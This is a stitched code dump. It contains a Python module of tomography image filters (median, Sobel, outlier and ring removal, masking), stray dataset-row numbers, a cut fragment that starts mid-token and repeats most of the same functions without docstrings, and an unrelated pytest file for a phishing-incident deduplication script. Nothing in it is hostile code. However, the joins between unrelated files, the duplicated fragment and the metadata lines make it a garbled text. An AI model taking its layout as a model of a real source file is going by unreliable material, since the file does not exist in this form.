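#     >>> filtered = median_filter(stack, size=3, axis=0)
#     >>> filtered.shape
#     (4, 64, 64)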
def median_filter_cuda(arr, size=3, axis=0):
"""
Apply median filter to 3D array along 0 axis with GPU support.
    The supported window sizes (winAllow) on A6000 and Titan X GPUs are 3 to 8.
Parameters
----------
arr : ndarray
Input array.
size : int, optional
The size of the filter.
axis : int, optional
Axis along which median filtering is performed.
Returns
-------
ndarray
Median filtered 3D array.
Example
-------
    >>> out = median_filter_cuda(arr, size=5)
    For more information regarding installing and using tomocuda, see
    https://github.com/kyuepublic/tomocuda
"""
try:
import tomocuda
winAllow = range(2, 16)
if (axis != 0):
arr = np.swapaxes(arr, 0, axis)
if size in winAllow:
loffset = int(size / 2)
roffset = int((size - 1) / 2)
prjsize = arr.shape[0]
imsizex = arr.shape[2]
imsizey = arr.shape[1]
filter = tomocuda.mFilter(imsizex, imsizey, prjsize, size)
out = np.zeros(shape=(prjsize, imsizey, imsizex), dtype=np.float32)
for step in range(prjsize):
# im_noisecu = arr[:][step][:].astype(np.float32)
im_noisecu = arr[step].astype(np.float32)
im_noisecu = np.lib.pad(im_noisecu, ((loffset, roffset),
(loffset, roffset)),
'symmetric')
im_noisecu = im_noisecu.flatten()
filter.setCuImage(im_noisecu)
filter.run2DFilter(size)
results = filter.retreive()
results = results.reshape(imsizey, imsizex)
out[step] = results
if (axis != 0):
out = np.swapaxes(out, 0, axis)
else:
warnings.warn("Window size not support, using cpu median filter")
out = median_filter(arr, size, axis)
except ImportError:
warnings.warn("The tomocuda is not support, using cpu median filter")
out = median_filter(arr, size, axis)
return out
def median_filter_nonfinite(arr, size=3, callback=None):
"""
Remove nonfinite values from a 3D array using an in-place 2D median filter.
The 2D selective median filter is applied along the last two axes of
the array.
.. versionadded:: 1.11
Parameters
----------
arr : ndarray
The 3D array with nonfinite values in it.
size : int, optional
The size of the filter.
callback : func(total, description, unit)
A function called after every internal loop iteration.
total is number of loop iterations.
description is 'Nonfinite median filter'.
unit is ' prjs'.
Returns
-------
ndarray
The corrected 3D array with all nonfinite values removed based upon the
local median value defined by the kernel size.
Raises
------
ValueError
If the filter comes across a kernel only containing non-finite values a
ValueError is raised for the user to increase their kernel size.
"""
# Defining a callback function if None is provided
if callback is None:
def callback(total, description, unit):
pass
    # Iterating through each projection to save on RAM
for projection in arr:
nonfinite_idx = np.nonzero(~np.isfinite(projection))
projection_copy = projection.copy()
        # Iterating through each bad value and replacing it with the finite median
for x_idx, y_idx in zip(*nonfinite_idx):
# Determining the lower and upper bounds for kernel
x_lower = max(0, x_idx - (size // 2))
x_higher = min(arr.shape[1], x_idx + (size // 2) + 1)
y_lower = max(0, y_idx - (size // 2))
y_higher = min(arr.shape[2], y_idx + (size // 2) + 1)
            # Extracting kernel data and finding the finite median
kernel_cropped_arr = projection_copy[x_lower:x_higher,
y_lower:y_higher]
if len(kernel_cropped_arr[np.isfinite(kernel_cropped_arr)]) == 0:
raise ValueError(
"Found kernel containing only non-finite values.\
Please increase kernel size")
median_corrected_arr = np.median(
kernel_cropped_arr[np.isfinite(kernel_cropped_arr)])
# Replacing bad data with finite median
projection[x_idx, y_idx] = median_corrected_arr
callback(arr.shape[0], 'Nonfinite median filter', ' prjs')
return arr
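# Hedged usage sketch (editor's addition): replace a single synthetic NaN with
# the median of its finite 3x3 neighbourhood; the data are made up.
#   >>> import numpy as np
#   >>> proj = np.ones((2, 8, 8), dtype=np.float32)
#   >>> proj[0, 3, 3] = np.nan
#   >>> fixed = median_filter_nonfinite(proj, size=3)
#   >>> bool(np.isfinite(fixed).all())   # -> True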
def sobel_filter(arr, axis=0, ncore=None):
"""
Apply Sobel filter to 3D array along specified axis.
Parameters
----------
arr : ndarray
Input array.
axis : int, optional
Axis along which sobel filtering is performed.
ncore : int, optional
Number of cores that will be assigned to jobs.
Returns
-------
ndarray
3D array of same shape as input.
"""
arr = dtype.as_float32(arr)
out = np.empty_like(arr)
if ncore is None:
ncore = mproc.mp.cpu_count()
with cf.ThreadPoolExecutor(ncore) as e:
slc = [slice(None)] * arr.ndim
for i in range(arr.shape[axis]):
slc[axis] = i
            e.submit(filters.sobel, arr[tuple(slc)], output=out[tuple(slc)])
return out
def remove_nan(arr, val=0., ncore=None):
"""
Replace NaN values in array with a given value.
Parameters
----------
arr : ndarray
Input array.
val : float, optional
        Value used to replace NaN values in the array.
ncore : int, optional
Number of cores that will be assigned to jobs.
Returns
-------
ndarray
Corrected array.
"""
arr = dtype.as_float32(arr)
val = np.float32(val)
with mproc.set_numexpr_threads(ncore):
ne.evaluate('where(arr!=arr, val, arr)', out=arr)
return arr
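# Hedged usage sketch (editor's addition): NaN entries are overwritten with
# ``val`` in place; the input values are made up.
#   >>> import numpy as np
#   >>> arr = np.array([[1.0, np.nan], [np.nan, 4.0]], dtype=np.float32)
#   >>> remove_nan(arr, val=0.)   # -> array([[1., 0.], [0., 4.]], dtype=float32)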
def remove_neg(arr, val=0., ncore=None):
"""
Replace negative values in array with a given value.
Parameters
----------
arr : ndarray
Input array.
val : float, optional
        Value used to replace negative values in the array.
ncore : int, optional
Number of cores that will be assigned to jobs.
Returns
-------
ndarray
Corrected array.
"""
arr = dtype.as_float32(arr)
val = np.float32(val)
with mproc.set_numexpr_threads(ncore):
ne.evaluate('where(arr<0, val, arr)', out=arr)
return arr
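# Hedged usage sketch (editor's addition): negative entries are overwritten
# with ``val`` in place; the input values are made up.
#   >>> import numpy as np
#   >>> arr = np.array([-1.0, 2.0, -3.0], dtype=np.float32)
#   >>> remove_neg(arr, val=0.)   # -> array([0., 2., 0.], dtype=float32)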
def remove_outlier(arr, dif, size=3, axis=0, ncore=None, out=None):
"""
Remove high intensity bright spots from a N-dimensional array by chunking
along the specified dimension, and performing (N-1)-dimensional median
filtering along the other dimensions.
Parameters
----------
arr : ndarray
Input array.
dif : float
Expected difference value between outlier value and
the median value of the array.
size : int
Size of the median filter.
axis : int, optional
Axis along which to chunk.
ncore : int, optional
Number of cores that will be assigned to jobs.
out : ndarray, optional
Output array for result. If same as arr, process
will be done in-place.
Returns
-------
ndarray
Corrected array.
"""
tmp = np.empty_like(arr)
ncore, chnk_slices = mproc.get_ncore_slices(arr.shape[axis], ncore=ncore)
filt_size = [size] * arr.ndim
filt_size[axis] = 1
with cf.ThreadPoolExecutor(ncore) as e:
slc = [slice(None)] * arr.ndim
for i in range(ncore):
slc[axis] = chnk_slices[i]
e.submit(filters.median_filter,
arr[tuple(slc)],
size=filt_size,
output=tmp[tuple(slc)])
arr = dtype.as_float32(arr)
tmp = dtype.as_float32(tmp)
dif = np.float32(dif)
with mproc.set_numexpr_threads(ncore):
out = ne.evaluate('where(arr-tmp>=dif,tmp,arr)', out=out)
return out
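# Hedged usage sketch (editor's addition): a single synthetic "zinger" that
# exceeds the local median by more than ``dif`` is replaced by that median;
# the data below are made up.
#   >>> import numpy as np
#   >>> proj = np.ones((4, 16, 16), dtype=np.float32)
#   >>> proj[1, 5, 5] = 100.0
#   >>> clean = remove_outlier(proj, dif=10, size=3)
#   >>> float(clean[1, 5, 5])   # -> 1.0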
def remove_outlier1d(arr, dif, size=3, axis=0, ncore=None, out=None):
"""
Remove high intensity bright spots from an array, using a one-dimensional
median filter along the specified axis.
Parameters
----------
arr : ndarray
Input array.
dif : float
Expected difference value between outlier value and
the median value of the array.
size : int
Size of the median filter.
axis : int, optional
Axis along which median filtering is performed.
ncore : int, optional
Number of cores that will be assigned to jobs.
out : ndarray, optional
Output array for result. If same as arr, process
will be done in-place.
Returns
-------
ndarray
Corrected array.
"""
arr = dtype.as_float32(arr)
dif = np.float32(dif)
tmp = np.empty_like(arr)
other_axes = [i for i in range(arr.ndim) if i != axis]
largest = np.argmax([arr.shape[i] for i in other_axes])
lar_axis = other_axes[largest]
ncore, chnk_slices = mproc.get_ncore_slices(arr.shape[lar_axis],
ncore=ncore)
filt_size = [1] * arr.ndim
filt_size[axis] = size
with cf.ThreadPoolExecutor(ncore) as e:
slc = [slice(None)] * arr.ndim
for i in range(ncore):
slc[lar_axis] = chnk_slices[i]
e.submit(filters.median_filter,
                     arr[tuple(slc)],
                     size=filt_size,
                     output=tmp[tuple(slc)],
mode='mirror')
with mproc.set_numexpr_threads(ncore):
out = ne.evaluate('where(arr-tmp>=dif,tmp,arr)', out=out)
return out
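# Hedged usage sketch (editor's addition): same idea as remove_outlier, but
# the median is taken along a single axis; the data are made up.
#   >>> import numpy as np
#   >>> proj = np.ones((4, 16, 16), dtype=np.float32)
#   >>> proj[2, 8, 8] = 50.0
#   >>> clean = remove_outlier1d(proj, dif=10, size=3, axis=0)
#   >>> float(clean[2, 8, 8])   # -> 1.0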
def remove_outlier_cuda(arr, dif, size=3, axis=0):
"""
Remove high intensity bright spots from a 3D array along axis 0
dimension using GPU.
Parameters
----------
arr : ndarray
Input array.
dif : float
Expected difference value between outlier value and
the median value of the array.
size : int
Size of the median filter.
axis : int, optional
Axis along which outlier removal is performed.
Returns
-------
ndarray
Corrected array.
Example
-------
>>> import tomocuda
>>> tomocuda.remove_outlier_cuda(arr, dif, 5)
For more information regarding install and using tomocuda, check
https://github.com/kyuepublic/tomocuda for more information
"""
arr = dtype.as_float32(arr)
dif = np.float32(dif)
try:
import tomocuda
winAllow = range(2, 16)
if (axis != 0):
arr = np.swapaxes(arr, 0, axis)
if size in winAllow:
prjsize = arr.shape[0]
loffset = int(size / 2)
roffset = int((size - 1) / 2)
imsizex = arr.shape[2]
imsizey = arr.shape[1]
filter = tomocuda.mFilter(imsizex, imsizey, prjsize, size)
out = np.zeros(shape=(prjsize, imsizey, imsizex), dtype=np.float32)
for step in range(prjsize):
im_noisecu = arr[step].astype(np.float32)
im_noisecu = np.lib.pad(im_noisecu, ((loffset, roffset),
(loffset, roffset)),
'symmetric')
im_noisecu = im_noisecu.flatten()
filter.setCuImage(im_noisecu)
filter.run2DRemoveOutliner(size, dif)
results = filter.retreive()
results = results.reshape(imsizey, imsizex)
out[step] = results
if (axis != 0):
out = np.swapaxes(out, 0, axis)
else:
warnings.warn("Window size not support, using cpu outlier removal")
out = remove_outlier(arr, dif, size)
except ImportError:
warnings.warn("The tomocuda is not support, using cpu outlier removal")
out = remove_outlier(arr, dif, size)
return out
def remove_ring(rec,
center_x=None,
center_y=None,
thresh=300.0,
thresh_max=300.0,
thresh_min=-100.0,
theta_min=30,
rwidth=30,
int_mode='WRAP',
ncore=None,
nchunk=None,
out=None):
"""
Remove ring artifacts from images in the reconstructed domain.
Descriptions of parameters need to be more clear for sure.
Parameters
----------
    rec : ndarray
Array of reconstruction data
center_x : float, optional
abscissa location of center of rotation
center_y : float, optional
ordinate location of center of rotation
thresh : float, optional
maximum value of an offset due to a ring artifact
thresh_max : float, optional
max value for portion of image to filter
thresh_min : float, optional
        min value for portion of image to filter
theta_min : int, optional
Features larger than twice this angle (degrees) will be considered
a ring artifact. Must be less than 180 degrees.
rwidth : int, optional
Maximum width of the rings to be filtered in pixels
int_mode : str, optional
'WRAP' for wrapping at 0 and 360 degrees, 'REFLECT' for reflective
boundaries at 0 and 180 degrees.
ncore : int, optional
Number of cores that will be assigned to jobs.
nchunk : int, optional
Chunk size for each core.
out : ndarray, optional
Output array for result. If same as arr, process
will be done in-place.
Returns
-------
ndarray
Corrected reconstruction data
"""
rec = dtype.as_float32(rec)
if out is None:
out = rec.copy()
else:
out = dtype.as_float32(out)
dz, dy, dx = rec.shape
if center_x is None:
center_x = (dx - 1.0) / 2.0
if center_y is None:
center_y = (dy - 1.0) / 2.0
if int_mode.lower() == 'wrap':
int_mode = 0
elif int_mode.lower() == 'reflect':
int_mode = 1
else:
raise ValueError("int_mode should be WRAP or REFLECT")
if not 0 <= theta_min < 180:
raise ValueError("theta_min should be in the range [0 - 180)")
args = (center_x, center_y, dx, dy, dz, thresh_max, thresh_min, thresh,
theta_min, rwidth, int_mode)
axis_size = rec.shape[0]
ncore, nchunk = mproc.get_ncore_nchunk(axis_size, ncore, nchunk)
with cf.ThreadPoolExecutor(ncore) as e:
for offset in range(0, axis_size, nchunk):
slc = np.s_[offset:offset + nchunk]
e.submit(extern.c_remove_ring, out[slc], *args)
return out
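# Hedged usage sketch (editor's addition): typical call on a reconstructed
# volume.  Requires the compiled tomopy extern library; the shape and the
# rwidth value are assumptions.
#   >>> import numpy as np
#   >>> rec = np.random.rand(8, 128, 128).astype(np.float32)
#   >>> rec_clean = remove_ring(rec, rwidth=20)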
def circ_mask(arr, axis, ratio=1, val=0., ncore=None):
"""
Apply circular mask to a 3D array.
Parameters
----------
arr : ndarray
Arbitrary 3D array.
axis : int
Axis along which mask will be performed.
ratio : int, optional
Ratio of the mask's diameter in pixels to
the smallest edge size along given axis.
val : int, optional
Value for the masked region.
Returns
-------
ndarray
Masked array.
"""
arr = dtype.as_float32(arr)
val = np.float32(val)
_arr = arr.swapaxes(0, axis)
dx, dy, dz = _arr.shape
mask = _get_mask(dy, dz, ratio)
with mproc.set_numexpr_threads(ncore):
ne.evaluate('where(mask, _arr, val)', out=_arr)
return _arr.swapaxes(0, axis)
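# Hedged usage sketch (editor's addition): zero out everything outside the
# inscribed circle of each slice; the shape is an assumption.
#   >>> import numpy as np
#   >>> rec = np.random.rand(8, 64, 64).astype(np.float32)
#   >>> masked = circ_mask(rec, axis=0, ratio=1, val=0.)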
def _get_mask(dx, dy, ratio):
"""
Calculate 2D boolean circular mask.
Parameters
----------
dx, dy : int
Dimensions of the 2D mask.
ratio : int
Ratio of the circle's diameter in pixels to
the smallest mask dimension.
Returns
-------
ndarray
2D boolean array.
"""
rad1 = dx / 2.
rad2 = dy / 2.
if dx < dy:
r2 = rad1 * rad1
else:
r2 = rad2 * rad2
y, x = np.ogrid[0.5 - rad1:0.5 + rad1, 0.5 - rad2:0.5 + rad2]
return x * x + y * y < ratio * ratio * r2
def enhance_projs_aps_1id(imgstack, median_ks=5, ncore=None):
"""
Enhance the projection images with weak contrast collected at APS 1ID
    This filter uses a median filter (to be switched to an enhanced recursive
    median filter, ERMF, in the future) for denoising, and histogram
    equalization for dynamic range adjustment to bring out the details.
Parameters
----------
imgstack : np.ndarray
        tomopy image stack (axis 0 is the omega direction)
    median_ks : int, optional
        2D median filter kernel size for local noise suppression
ncore : int, optional
number of cores used for speed up
Returns
-------
ndarray
3D enhanced image stacks.
"""
ncore = mproc.mp.cpu_count() - 1 if ncore is None else ncore
# need to use multiprocessing to speed up the process
tmp = []
with cf.ProcessPoolExecutor(ncore) as e:
for n_img in range(imgstack.shape[0]):
tmp.append(
e.submit(
_enhance_img,
imgstack[n_img, :, :],
median_ks,
))
return np.stack([me.result() for me in tmp], axis=0)
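# Hedged usage sketch (editor's addition): enhance a small synthetic stack.
# Because a ProcessPoolExecutor is used internally, this should be called
# from inside an ``if __name__ == "__main__":`` guard on some platforms.
#   >>> import numpy as np
#   >>> stack = np.random.rand(4, 128, 128)
#   >>> enhanced = enhance_projs_aps_1id(stack, median_ks=5)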
def _enhance_img(img, median_ks, normalized=True):
"""
Enhance the projection image from aps 1ID to counter its weak contrast
nature
Parameters
----------
img : ndarray
original projection image collected at APS 1ID
median_ks: int
kernel size of the 2D median filter, must be odd
normalized: bool, optional
specify whether the enhanced image is normalized between 0 and 1,
default is True
Returns
-------
ndarray
enhanced projection image
"""
wgt = _calc_histequal_wgt(img)
img = medfilt2d(img, kernel_size=median_ks).astype(np.float64)
img = ne.evaluate('(img**2)*wgt', out=img)
return img / img.max() if normalized else img
def _calc_histequal_wgt(img):
"""
Calculate the histogram equalization weight for a given image
Parameters
----------
img : ndarray
2D images
Returns
-------
ndarray
        histogram equalization weights (0-1) in the same shape as the original
image
"""
return (np.sort(img.flatten()).searchsorted(img) + 1) / np.prod(img.shape)
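# Editor's note (worked example, not part of the original module): the weight
# of a pixel is its empirical CDF value.  For the 2x2 image [[1, 3], [2, 4]]
# the sorted values are [1, 2, 3, 4], searchsorted gives ranks [[0, 2], [1, 3]],
# so the weights are (ranks + 1) / 4 = [[0.25, 0.75], [0.5, 1.0]].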
| 30.649061
| 79
| 0.582354
|
s.sobel, arr[slc], output=out[slc])
return out
def remove_nan(arr, val=0., ncore=None):
arr = dtype.as_float32(arr)
val = np.float32(val)
with mproc.set_numexpr_threads(ncore):
ne.evaluate('where(arr!=arr, val, arr)', out=arr)
return arr
def remove_neg(arr, val=0., ncore=None):
arr = dtype.as_float32(arr)
val = np.float32(val)
with mproc.set_numexpr_threads(ncore):
ne.evaluate('where(arr<0, val, arr)', out=arr)
return arr
def remove_outlier(arr, dif, size=3, axis=0, ncore=None, out=None):
tmp = np.empty_like(arr)
ncore, chnk_slices = mproc.get_ncore_slices(arr.shape[axis], ncore=ncore)
filt_size = [size] * arr.ndim
filt_size[axis] = 1
with cf.ThreadPoolExecutor(ncore) as e:
slc = [slice(None)] * arr.ndim
for i in range(ncore):
slc[axis] = chnk_slices[i]
e.submit(filters.median_filter,
arr[tuple(slc)],
size=filt_size,
output=tmp[tuple(slc)])
arr = dtype.as_float32(arr)
tmp = dtype.as_float32(tmp)
dif = np.float32(dif)
with mproc.set_numexpr_threads(ncore):
out = ne.evaluate('where(arr-tmp>=dif,tmp,arr)', out=out)
return out
def remove_outlier1d(arr, dif, size=3, axis=0, ncore=None, out=None):
arr = dtype.as_float32(arr)
dif = np.float32(dif)
tmp = np.empty_like(arr)
other_axes = [i for i in range(arr.ndim) if i != axis]
largest = np.argmax([arr.shape[i] for i in other_axes])
lar_axis = other_axes[largest]
ncore, chnk_slices = mproc.get_ncore_slices(arr.shape[lar_axis],
ncore=ncore)
filt_size = [1] * arr.ndim
filt_size[axis] = size
with cf.ThreadPoolExecutor(ncore) as e:
slc = [slice(None)] * arr.ndim
for i in range(ncore):
slc[lar_axis] = chnk_slices[i]
e.submit(filters.median_filter,
                     arr[tuple(slc)],
                     size=filt_size,
                     output=tmp[tuple(slc)],
mode='mirror')
with mproc.set_numexpr_threads(ncore):
out = ne.evaluate('where(arr-tmp>=dif,tmp,arr)', out=out)
return out
def remove_outlier_cuda(arr, dif, size=3, axis=0):
arr = dtype.as_float32(arr)
dif = np.float32(dif)
try:
import tomocuda
winAllow = range(2, 16)
if (axis != 0):
arr = np.swapaxes(arr, 0, axis)
if size in winAllow:
prjsize = arr.shape[0]
loffset = int(size / 2)
roffset = int((size - 1) / 2)
imsizex = arr.shape[2]
imsizey = arr.shape[1]
filter = tomocuda.mFilter(imsizex, imsizey, prjsize, size)
out = np.zeros(shape=(prjsize, imsizey, imsizex), dtype=np.float32)
for step in range(prjsize):
im_noisecu = arr[step].astype(np.float32)
im_noisecu = np.lib.pad(im_noisecu, ((loffset, roffset),
(loffset, roffset)),
'symmetric')
im_noisecu = im_noisecu.flatten()
filter.setCuImage(im_noisecu)
filter.run2DRemoveOutliner(size, dif)
results = filter.retreive()
results = results.reshape(imsizey, imsizex)
out[step] = results
if (axis != 0):
out = np.swapaxes(out, 0, axis)
else:
warnings.warn("Window size not support, using cpu outlier removal")
out = remove_outlier(arr, dif, size)
except ImportError:
warnings.warn("The tomocuda is not support, using cpu outlier removal")
out = remove_outlier(arr, dif, size)
return out
def remove_ring(rec,
center_x=None,
center_y=None,
thresh=300.0,
thresh_max=300.0,
thresh_min=-100.0,
theta_min=30,
rwidth=30,
int_mode='WRAP',
ncore=None,
nchunk=None,
out=None):
rec = dtype.as_float32(rec)
if out is None:
out = rec.copy()
else:
out = dtype.as_float32(out)
dz, dy, dx = rec.shape
if center_x is None:
center_x = (dx - 1.0) / 2.0
if center_y is None:
center_y = (dy - 1.0) / 2.0
if int_mode.lower() == 'wrap':
int_mode = 0
elif int_mode.lower() == 'reflect':
int_mode = 1
else:
raise ValueError("int_mode should be WRAP or REFLECT")
if not 0 <= theta_min < 180:
raise ValueError("theta_min should be in the range [0 - 180)")
args = (center_x, center_y, dx, dy, dz, thresh_max, thresh_min, thresh,
theta_min, rwidth, int_mode)
axis_size = rec.shape[0]
ncore, nchunk = mproc.get_ncore_nchunk(axis_size, ncore, nchunk)
with cf.ThreadPoolExecutor(ncore) as e:
for offset in range(0, axis_size, nchunk):
slc = np.s_[offset:offset + nchunk]
e.submit(extern.c_remove_ring, out[slc], *args)
return out
def circ_mask(arr, axis, ratio=1, val=0., ncore=None):
arr = dtype.as_float32(arr)
val = np.float32(val)
_arr = arr.swapaxes(0, axis)
dx, dy, dz = _arr.shape
mask = _get_mask(dy, dz, ratio)
with mproc.set_numexpr_threads(ncore):
ne.evaluate('where(mask, _arr, val)', out=_arr)
return _arr.swapaxes(0, axis)
def _get_mask(dx, dy, ratio):
rad1 = dx / 2.
rad2 = dy / 2.
if dx < dy:
r2 = rad1 * rad1
else:
r2 = rad2 * rad2
y, x = np.ogrid[0.5 - rad1:0.5 + rad1, 0.5 - rad2:0.5 + rad2]
return x * x + y * y < ratio * ratio * r2
def enhance_projs_aps_1id(imgstack, median_ks=5, ncore=None):
ncore = mproc.mp.cpu_count() - 1 if ncore is None else ncore
tmp = []
with cf.ProcessPoolExecutor(ncore) as e:
for n_img in range(imgstack.shape[0]):
tmp.append(
e.submit(
_enhance_img,
imgstack[n_img, :, :],
median_ks,
))
return np.stack([me.result() for me in tmp], axis=0)
def _enhance_img(img, median_ks, normalized=True):
wgt = _calc_histequal_wgt(img)
img = medfilt2d(img, kernel_size=median_ks).astype(np.float64)
img = ne.evaluate('(img**2)*wgt', out=img)
return img / img.max() if normalized else img
def _calc_histequal_wgt(img):
return (np.sort(img.flatten()).searchsorted(img) + 1) / np.prod(img.shape)
| true
| true
|
1c3eaf4d4b2cd9a62fb998a099bf380bf5054503
| 10,095
|
py
|
Python
|
Packs/Phishing/Scripts/PhishingDedupPreprocessingRule/PhishingDedupPreprocessingRule_test.py
|
sandeepklog/content
|
00e67220bf2842ff3931f8493b2b097f07aebcf4
|
[
"MIT"
] | null | null | null |
Packs/Phishing/Scripts/PhishingDedupPreprocessingRule/PhishingDedupPreprocessingRule_test.py
|
sandeepklog/content
|
00e67220bf2842ff3931f8493b2b097f07aebcf4
|
[
"MIT"
] | 2
|
2019-09-18T08:11:22.000Z
|
2020-11-24T18:50:28.000Z
|
Packs/Phishing/Scripts/PhishingDedupPreprocessingRule/PhishingDedupPreprocessingRule_test.py
|
sandeepklog/content
|
00e67220bf2842ff3931f8493b2b097f07aebcf4
|
[
"MIT"
] | 2
|
2020-10-11T18:01:32.000Z
|
2020-10-14T03:21:23.000Z
|
from CommonServerPython import *
from PhishingDedupPreprocessingRule import *
import json
ID_CONtER = 0
EXISTING_INCIDENTS = []
RESULTS = None
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
IDS_COUNTER = 0
text = "Imagine there's no countries It isn't hard to do Nothing to kill or die for And no religion too " \
"Imagine all the people Living life in peace"
text2 = "Love of my life, you've hurt me You've broken my heart and now you leave me Love of my life, can't you see?\
Bring it back, bring it back Don't take it away from me, because you don't know What it means to me"
def create_incident(subject=None, body=None, html=None, emailfrom=None):
global IDS_COUNTER
incident = {
"CustomFields": {},
"id": str(IDS_COUNTER),
"name": ' '.join(str(x) for x in [subject, body, html, emailfrom, id])
}
IDS_COUNTER += 1
if subject is not None:
incident['CustomFields']['emailsubject'] = subject
if body is not None:
incident['CustomFields']['emailbody'] = body
if html is not None:
incident['CustomFields']['emailbodyhtml'] = html
if emailfrom is not None:
incident['CustomFields']['emailfrom'] = emailfrom
return incident
def set_existing_incidents_list(incidents_list):
global EXISTING_INCIDENTS
EXISTING_INCIDENTS = incidents_list
def executeCommand(command, args=None):
global EXISTING_INCIDENTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
if command == 'GetIncidentsByQuery':
incidents_str = json.dumps(EXISTING_INCIDENTS)
return [{'Contents': incidents_str, 'Type': 'not error'}]
if command == 'linkIncidents':
EXISTING_INCIDENT_ID = args['incidentId']
DUP_INCIDENT_ID = args['linkedIncidentIDs']
def results(arg):
global RESULTS
RESULTS = arg
def duplicated_incidents_found(existing_incident):
return existing_incident['id'] == EXISTING_INCIDENT_ID
def test_same_incidents_text_only(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'TextOnly'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert duplicated_incidents_found(existing_incident)
def test_different_text_only(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
text = "Imagine there's no countries It isn't hard to do Nothing to kill or die for And no religion too " \
"Imagine all the people Living life in peace"
existing_incident = create_incident(body=text2, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'TextOnly'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert not duplicated_incidents_found(existing_incident)
def test_same_incidents_exact_sender_match_same_senders(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'Exact'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert duplicated_incidents_found(existing_incident)
def test_same_incidents_exact_sender_match_different_senders(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
text = "Imagine there's no countries It isn't hard to do Nothing to kill or die for And no religion too " \
"Imagine all the people Living life in peace"
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'Exact'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text, emailfrom='mt.kb.user2@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert not duplicated_incidents_found(existing_incident)
def test_same_incidents_exact_sender_match_same_senders_different_texts(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'Exact'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text2, emailfrom='mt.kb.user@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert not duplicated_incidents_found(existing_incident)
def test_same_incidents_domain_sender_match_same_senders(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'Domain'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert duplicated_incidents_found(existing_incident)
def test_same_incidents_domain_sender_match_same_domain(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'Domain'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text, emailfrom='mt.kb.user2@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert duplicated_incidents_found(existing_incident)
def test_same_incidents_domain_sender_match_same_domain_different_texts(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'Domain'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text2, emailfrom='mt.kb.user2@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert not duplicated_incidents_found(existing_incident)
def test_slightly_different_texts(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
